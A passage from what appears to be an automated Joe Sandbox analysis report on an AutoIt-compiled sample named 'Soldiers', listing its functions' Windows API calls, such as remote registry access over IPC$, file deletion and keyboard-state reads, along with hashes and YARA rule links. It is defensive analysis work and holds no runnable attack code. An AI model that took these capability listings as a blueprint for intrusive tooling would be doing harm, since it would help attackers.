                                                          • Instruction Fuzzy Hash: 59515B72904309EFCB14CFA9DC84EAEBBB9EF88710F14851DF949A7250D731A944CB60
                                                          Function 0094A48D Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadStringW.USER32(00000066,?,00000FFF,?,?,00970990,?,009230B6,00000085,?), ref: 0094A4D4
                                                            • Part of subcall function 008F1A36: _memmove.LIBCMT ref: 008F1A77
                                                          • LoadStringW.USER32(?,?,00000FFF,?,?,009230B6,00000085,?), ref: 0094A4F6
                                                          • __swprintf.LIBCMT ref: 0094A54F
                                                          • __swprintf.LIBCMT ref: 0094A568
                                                          • _wprintf.LIBCMT ref: 0094A61E
                                                          • _wprintf.LIBCMT ref: 0094A63C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: LoadString__swprintf_wprintf$_memmove
                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                          • API String ID: 311963372-2391861430
                                                          • Opcode ID: 8a24bb769d87648a10d51bc1457859a6514fca80eb170670fb8dbd2f69861e39
                                                          • Instruction ID: 24fa78c98d8593e13e871781e761752dd56ee5174310d70aa10b0e2fd91eab01
                                                          • Opcode Fuzzy Hash: 8a24bb769d87648a10d51bc1457859a6514fca80eb170670fb8dbd2f69861e39
                                                          • Instruction Fuzzy Hash: 15516C7294011DAACF15EBF4CD4AEEEB779EF44340F104265F605A20A1EB316F58DBA2
                                                          Function 00949710 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0094951A: __time64.LIBCMT ref: 00949524
                                                            • Part of subcall function 008F4A8C: _fseek.LIBCMT ref: 008F4AA4
                                                          • __wsplitpath.LIBCMT ref: 009497EF
                                                            • Part of subcall function 0090431E: __wsplitpath_helper.LIBCMT ref: 0090435E
                                                          • _wcscpy.LIBCMT ref: 00949802
                                                          • _wcscat.LIBCMT ref: 00949815
                                                          • __wsplitpath.LIBCMT ref: 0094983A
                                                          • _wcscat.LIBCMT ref: 00949850
                                                          • _wcscat.LIBCMT ref: 00949863
                                                            • Part of subcall function 00949560: _memmove.LIBCMT ref: 00949599
                                                            • Part of subcall function 00949560: _memmove.LIBCMT ref: 009495A8
                                                          • _wcscmp.LIBCMT ref: 009497AA
                                                            • Part of subcall function 00949CF1: _wcscmp.LIBCMT ref: 00949DE1
                                                            • Part of subcall function 00949CF1: _wcscmp.LIBCMT ref: 00949DF4
                                                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00949A0D
                                                          • _wcsncpy.LIBCMT ref: 00949A80
                                                          • DeleteFileW.KERNEL32(?,?), ref: 00949AB6
                                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00949ACC
                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00949ADD
                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00949AEF
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                          • String ID:
                                                          • API String ID: 1500180987-0
                                                          • Opcode ID: 99792d87972ab2333aaf164ba80f95c8a737e80c46a852a3c783923f53cbb9c6
                                                          • Instruction ID: 3c54fe2b075e3054e96df3ef0565f4e9a19ffbf00004d0b3e0561eeabe7211f9
                                                          • Opcode Fuzzy Hash: 99792d87972ab2333aaf164ba80f95c8a737e80c46a852a3c783923f53cbb9c6
                                                          • Instruction Fuzzy Hash: 32C10BB1900229AADF11DFA5CC85EDFB7BDEF85310F0040AAF609E6151EB749A848F65
                                                          Function 008F5BD7 Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _memset.LIBCMT ref: 008F5BF1
                                                          • GetMenuItemCount.USER32(009A7890,?,?), ref: 00930E7B
                                                          • GetMenuItemCount.USER32(009A7890), ref: 00930F2B
                                                          • GetCursorPos.USER32(?), ref: 00930F6F
                                                          • SetForegroundWindow.USER32(00000000), ref: 00930F78
                                                          • TrackPopupMenuEx.USER32(009A7890,00000000,?,00000000,00000000,00000000), ref: 00930F8B
                                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00930F97
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                          • String ID:
                                                          • API String ID: 2751501086-0
                                                          • Opcode ID: 996242c0760cd1cec2a4e753aea415da78d47855ea4ff578bd80abd6e9cbf000
                                                          • Instruction ID: f5c2fbd3e1afb0f4c8584ca6e339b964d8a0f17e57bd5b0eea02048fc3834704
                                                          • Opcode Fuzzy Hash: 996242c0760cd1cec2a4e753aea415da78d47855ea4ff578bd80abd6e9cbf000
                                                          • Instruction Fuzzy Hash: 01710531644709BFEB308B65CC95FAABFA8FF84364F104216F628AA1D1C7B16850DF90
                                                          Function 009383FA Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 008F1821: _memmove.LIBCMT ref: 008F185B
                                                          • _memset.LIBCMT ref: 00938489
                                                          • WNetAddConnection2W.MPR(?,?,?,00000000,\IPC$,?), ref: 009384BE
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009384DA
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 009384F6
                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00938520
                                                          • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00938548
                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00938553
                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00938558
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                          • API String ID: 1411258926-22481851
                                                          • Opcode ID: aeaa0d97f0482d2340ffbd47679c47084b8605ba95ca9c0145d94b9dc9ba3096
                                                          • Instruction ID: 10071bc6d1932815ee19d8538ea0378a67eef9ad17069383a215124eb75a62cb
                                                          • Opcode Fuzzy Hash: aeaa0d97f0482d2340ffbd47679c47084b8605ba95ca9c0145d94b9dc9ba3096
                                                          • Instruction Fuzzy Hash: A3410372D1022DEBCF11EBA8DC999EEBB78FF44750F004169F915A2161EB719E04CB91
                                                          Function 0096147A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0096040D,?,?), ref: 00961491
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpper
                                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                          • API String ID: 3964851224-909552448
                                                          • Opcode ID: 3919bb7f71918668d8c91e7bf2a6f0ce72c3c5f8bc4a98012fcabe58b6b4c2f1
                                                          • Instruction ID: c665f9bed1024254421f604fc5de3939dfe223042f0c84fba66aad706919ffbf
                                                          • Opcode Fuzzy Hash: 3919bb7f71918668d8c91e7bf2a6f0ce72c3c5f8bc4a98012fcabe58b6b4c2f1
                                                          • Instruction Fuzzy Hash: 7E41577051435ADBCF10EF94D851AEA7368BF91300FA44419FC969B2A2DB30ED19DB61
                                                          Function 0093FF5C Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0092FB41,00000010,?,Bad directive syntax error,00970980,00000000,?,?,?), ref: 0093FF7D
                                                          • LoadStringW.USER32(00000000,?,0092FB41,00000010,?,Bad directive syntax error,00970980,00000000,?,?,?,?,?,?,?,00000001), ref: 0093FF84
                                                            • Part of subcall function 008F1A36: _memmove.LIBCMT ref: 008F1A77
                                                          • _wprintf.LIBCMT ref: 0093FFB7
                                                          • __swprintf.LIBCMT ref: 0093FFD9
                                                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010,.,00000001,Error: ,?,?,00000001), ref: 00940048
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                          • API String ID: 1506413516-4153970271
                                                          • Opcode ID: 043c992352c8b8ace59a4349bee4a8bad7f569950867d1a4d15eeaa8b9253c82
                                                          • Instruction ID: a3bc5f4a5cd2580f7920e239be9aa6ff2de8c39ea94e8136e70f6b784ca32a9c
                                                          • Opcode Fuzzy Hash: 043c992352c8b8ace59a4349bee4a8bad7f569950867d1a4d15eeaa8b9253c82
                                                          • Instruction Fuzzy Hash: DA216F3295021EEBCF11EFA4CC1AEFE7739FF54304F044455F605A20A2DA71AA68DB51
                                                          Function 00945882 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 008F1821: _memmove.LIBCMT ref: 008F185B
                                                            • Part of subcall function 008F153B: _memmove.LIBCMT ref: 008F15C4
                                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 009458EB
                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00945901
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00945912
                                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00945924
                                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00945935
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: SendString$_memmove
                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                          • API String ID: 2279737902-1007645807
                                                          • Opcode ID: 5310a7cf760b8cee2eb92739f7c7c0a8356401312f988ce43d2f149052b2a513
                                                          • Instruction ID: c0efd7426fb4e60f4ac22fc00b6aa3d5c7e805790e8b83f529c9a70dd10e9aff
                                                          • Opcode Fuzzy Hash: 5310a7cf760b8cee2eb92739f7c7c0a8356401312f988ce43d2f149052b2a513
                                                          • Instruction Fuzzy Hash: 99119031A5112DFADF20E7B9DC4ADBF6B7CFBD5B50F800429B501E20D1DAA01904C6A1
                                                          Function 00944C0C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: _wcscpy$#115#116_memmove_strcat
                                                          • String ID: 0.0.0.0
                                                          • API String ID: 1745391200-3771769585
                                                          • Opcode ID: 672ebdfa5f6b18b6d3bdf70126d8c728da5764a7e711ad7134777219e53d89cf
                                                          • Instruction ID: 833e3f65cdb4e94ed5144c928be4c4322a774a6e96bc83110342615ed30029ee
                                                          • Opcode Fuzzy Hash: 672ebdfa5f6b18b6d3bdf70126d8c728da5764a7e711ad7134777219e53d89cf
                                                          • Instruction Fuzzy Hash: 84110632909109EFCB15AB709C8AFEA77BCDFC1711F0801A6F189960D1EF7599C19A91
                                                          Function 00945530 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • timeGetTime.WINMM ref: 00945535
                                                            • Part of subcall function 0090083E: timeGetTime.WINMM(?,00000002,008EC22C), ref: 00900842
                                                          • Sleep.KERNEL32(0000000A), ref: 00945561
                                                          • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00945585
                                                          • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 009455A7
                                                          • SetActiveWindow.USER32 ref: 009455C6
                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 009455D4
                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 009455F3
                                                          • Sleep.KERNEL32(000000FA), ref: 009455FE
                                                          • IsWindow.USER32 ref: 0094560A
                                                          • EndDialog.USER32(00000000), ref: 0094561B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                          • String ID: BUTTON
                                                          • API String ID: 1194449130-3405671355
                                                          • Opcode ID: 5a4d00710d5ca5c4af5ab9be1a58992b67ac11afea289a49b7748ac915088545
                                                          • Instruction ID: a49fe8a9e84014cb3486cd33ca51b6fdda5e23659eb0387897e611658da62dbe
                                                          • Opcode Fuzzy Hash: 5a4d00710d5ca5c4af5ab9be1a58992b67ac11afea289a49b7748ac915088545
                                                          • Instruction Fuzzy Hash: 3E215EB162C604AFE7406BE0EC8AF363B6AFBC5745F512018F805811A2DB719D90FBA1
                                                          Function 008E33E7 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 68windowregistryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSysColorBrush.USER32(0000000F), ref: 008E3444
                                                          • RegisterClassExW.USER32(00000030), ref: 008E346E
                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008E347F
                                                          • InitCommonControlsEx.COMCTL32(?), ref: 008E349C
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008E34AC
                                                          • LoadIconW.USER32(000000A9), ref: 008E34C2
                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008E34D1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                          • API String ID: 2914291525-1005189915
                                                          • Opcode ID: 0515e6919a52d4e5d590cae9f1293266c345f068f104c97123d03b2bc3c78d4e
                                                          • Instruction ID: 06735bd354421f3417820cffe0a087a0c8806e52f7b4b8aaadfb4ef3bba74cad
                                                          • Opcode Fuzzy Hash: 0515e6919a52d4e5d590cae9f1293266c345f068f104c97123d03b2bc3c78d4e
                                                          • Instruction Fuzzy Hash: 743107B2958309EFDB508FA4DC8ABC9BBF0FF09310F10411AE595E62A0D7B91581DF90
                                                          Function 008E3411 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSysColorBrush.USER32(0000000F), ref: 008E3444
                                                          • RegisterClassExW.USER32(00000030), ref: 008E346E
                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008E347F
                                                          • InitCommonControlsEx.COMCTL32(?), ref: 008E349C
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008E34AC
                                                          • LoadIconW.USER32(000000A9), ref: 008E34C2
                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008E34D1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                          • API String ID: 2914291525-1005189915
                                                          • Opcode ID: 866d370b10f33d2d3ed0d9f4aa9365b47397af1b481c667000918378dfab6cfe
                                                          • Instruction ID: bc74b0124d9cd2c817595ef15d26cd8eaa9bb1a8a678629fd5eaa4c0fc3a4841
                                                          • Opcode Fuzzy Hash: 866d370b10f33d2d3ed0d9f4aa9365b47397af1b481c667000918378dfab6cfe
                                                          • Instruction Fuzzy Hash: AC21E8B2929309EFDB009FD8EC8AB9DBBF4FB49710F00411AF518A62A0D7B51584DF91
                                                          Function 0094DBD0 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 008E4D37: __itow.LIBCMT ref: 008E4D62
                                                            • Part of subcall function 008E4D37: __swprintf.LIBCMT ref: 008E4DAC
                                                          • CoInitialize.OLE32(00000000,00970980), ref: 0094DC2D
                                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0094DCC0
                                                          • SHGetDesktopFolder.SHELL32(?), ref: 0094DCD4
                                                          • CoCreateInstance.OLE32(00973D4C,00000000,00000001,0099B86C,?), ref: 0094DD20
                                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0094DD8F
                                                          • CoTaskMemFree.OLE32(?,?), ref: 0094DDE7
                                                          • _memset.LIBCMT ref: 0094DE24
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0094DE60
                                                          • SHGetPathFromIDListW.SHELL32(00000000,?,?), ref: 0094DE83
                                                          • CoTaskMemFree.OLE32(00000000), ref: 0094DE8A
                                                          • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0094DEC1
                                                          • CoUninitialize.OLE32(00000001,00000000), ref: 0094DEC3
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                          • String ID:
                                                          • API String ID: 1246142700-0
                                                          • Opcode ID: 8f0db11442f645d0fa7728119527401c3f514c12c438738a3a8740ece02eeee7
                                                          • Instruction ID: ccbc0cfb733f35ba06963ebdf29d710e8059ff2e99e7937f3d6cd570329b8ee2
                                                          • Opcode Fuzzy Hash: 8f0db11442f645d0fa7728119527401c3f514c12c438738a3a8740ece02eeee7
                                                          • Instruction Fuzzy Hash: 39B1EA75A00109EFDB14DFA4C889DAEBBB9FF89304B148459F909EB261DB30ED41CB91
                                                          Function 0094081B Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetKeyboardState.USER32(?), ref: 00940896
                                                          • SetKeyboardState.USER32(?), ref: 00940901
                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00940921
                                                          • GetKeyState.USER32(000000A0), ref: 00940938
                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00940967
